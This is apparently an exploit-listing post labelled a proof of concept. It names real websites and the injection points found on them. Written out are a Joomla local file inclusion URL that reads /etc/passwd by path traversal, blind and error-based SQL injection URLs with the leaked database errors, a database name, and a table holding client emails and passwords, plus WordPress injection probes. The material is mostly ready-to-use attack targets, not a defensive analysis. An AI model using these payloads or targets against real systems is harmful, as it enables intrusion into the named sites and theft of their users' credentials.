nullsite.altervista.org

#Author: Emiliano Febbi (*emilianofebbi.1994@gmail.com*)
#Web Site Creator => ???
#Dork => [joomla]: /ofc_upload_image.php?name=
#CMS => Joomla , FCKeditor , WP
#Vulnz => Blind SQLi/SQLi/LFI
#Date => 27/04/2023

*PoC*
[code]

#1 #Joomla LFI
#Dork:inurl:/ofc_upload_image.php?name=
#version: ???

https://www.emaths.co.uk/index.php?option=com_content&view=article&id=6:key-stage-5-schemes-of-work&Itemid=510&jsmallfib=1&dir=JSROOT/SchemesOfWork/A Level/administrator/components/com_acymailing/inc/openflash/php-ofc-library//administrator/components/com_acymailing/inc/openflash/php-ofc-library/ofc_upload_image.php?name=../../../../../../../../../../../../etc/passwd

#2 #FCKeditor Blind SQLi
#version: 2.5.1 - Build 17566

http://www.hollabrasil.com.br/cms/admin/?nav_id=1 <= no auth required
http://www.hollabrasil.com.br/cms/admin/?nav_id=1 <= [*Blind SQLi*]

#error:
PHP Warning: mysql_fetch_assoc() expects parameter 1 to be resource, boolean given in E:\Home\hollabrasil\Web\cms\inc\class.data.php on line 20
PHP Warning: mysql_fetch_array() expects parameter 1 to be resource, boolean given in E:\Home\hollabrasil\Web\cms\inc\class.data.php on line 138
PHP Warning: mysql_num_rows() expects parameter 1 to be resource, boolean given in E:\Home\hollabrasil\Web\cms\admin\index.php on line 147

#DB name: "hollabrasil"

#Extra 1
#artery found presents:
http://www.eos-ventures.com/project.php?id=7 <= [*SQLi*]

#Extra 2
#DB type: MSAccess
http://deepinwood.co.uk/pages/about.asp?Nav_ID=1 <= [*SQLi*]
http://deepinwood.co.uk/pages/myaccount.asp <= bugged
#tables:
products
client => #columns: email , password
news

#Extra 3
https://www.sempreflu.com.br/forum.php?row[forum]=-18&PHPSESSID=e26ab6634b2083fd3ba840b90647f441 <= found???

end artery
#end

#3 #Wordpress
1- https://valigeriaserra.it/?id_prodotto=-9193 ; presents error
2- http://www.ravennaincomune.it/wp/index.php/page/77/?cat=-1 ; time based???
3- https://fbiscience.com/wp/index.php/en/produkte-2/?s=test ; Warning: Constant WP_USE_THEMES already defined in /var/www/vhosts/fbiscience.com/httpdocs/wp/index.php on line 14

[/code]
*PoC End*